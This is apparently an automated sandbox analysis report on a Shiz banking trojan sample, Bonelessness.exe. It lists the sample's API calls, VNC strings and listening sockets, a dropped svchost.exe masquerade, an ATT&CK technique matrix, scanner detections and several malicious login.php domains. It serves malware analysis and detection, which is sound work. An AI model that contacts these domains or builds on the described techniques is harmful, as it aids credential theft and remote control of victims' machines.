Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00402340 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,

0_2_00402340

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00403920 GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,

0_2_00403920

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D248C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,

1_2_02D248C0

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00403310 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,

0_2_00403310

Source: Bonelessness.exe, Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp

Binary or memory string: wireshark.exe

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: Bonelessness.exe	String found in binary or memory: RFB 003.006
Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: RFB 003.006
Source: Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: RFB 003.006
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: $BRFB 003.006

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D398E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	1_2_02D398E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D4FFE0 setsockopt,htons,socket,setsockopt,bind,	1_2_02D4FFE0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D50DB0 htons,socket,setsockopt,closesocket,bind,listen,	1_2_02D50DB0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028A98E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	5_2_028A98E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028BFFE0 setsockopt,htons,socket,setsockopt,bind,	5_2_028BFFE0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028C0DB0 htons,socket,setsockopt,closesocket,bind,listen,	5_2_028C0DB0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_024598E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	6_2_024598E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0246FFE0 setsockopt,htons,socket,setsockopt,bind,	6_2_0246FFE0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02470DB0 htons,socket,setsockopt,closesocket,bind,listen,	6_2_02470DB0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012F98E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,	8_2_012F98E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01310DB0 htons,socket,setsockopt,closesocket,bind,listen,	8_2_01310DB0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130FFE0 setsockopt,htons,socket,setsockopt,bind,	8_2_0130FFE0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	34 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	111 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Create Account	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Account Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	623 Process Injection	1 Abuse Elevation Control Mechanism	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	111 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	21 Registry Run Keys / Startup Folder	3 Software Packing	LSA Secrets	143 System Information Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	321 Masquerading	DCSync	561 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	241 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	623 Process Injection	/etc/passwd and /etc/shadow	13 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Bootkit	Network Sniffing	11 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Bonelessness.exe	96%	ReversingLabs	Win32.Trojan.Shiz
Bonelessness.exe	100%	Avira	TR/Spy.Shiz.avskt
Bonelessness.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://api.w.org/	0%	URL Reputation	safe
http://lyrysor.com/login.php	100%	Avira URL Cloud	phishing
http://gadyniw.com/login.phpMy	100%	Avira URL Cloud	malware
http://lyvyxor.com/login.php	100%	Avira URL Cloud	malware
http://galynuh.com/login.php.	100%	Avira URL Cloud	malware
http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	0%	Avira URL Cloud	safe
https://domaincntrol.com/?orighost=	0%	Avira URL Cloud	safe
https://nojs.domaincntrol.com	0%	Avira URL Cloud	safe
http://puzylyp.com/login.php	100%	Avira URL Cloud	malware
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix	0%	Avira URL Cloud	safe
http://vojyqem.com/login.phpTemp	100%	Avira URL Cloud	malware
http://galynuh.com/login.php	100%	Avira URL Cloud	malware
http://lyxynyx.com/login.php	100%	Avira URL Cloud	malware
http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	100%	Avira URL Cloud	malware
http://qetyhyg.com/login.php	100%	Avira URL Cloud	phishing
http://lymyxid.com/login.php	100%	Avira URL Cloud	malware
http://galyqaz.com/display.cfm	100%	Avira URL Cloud	malware
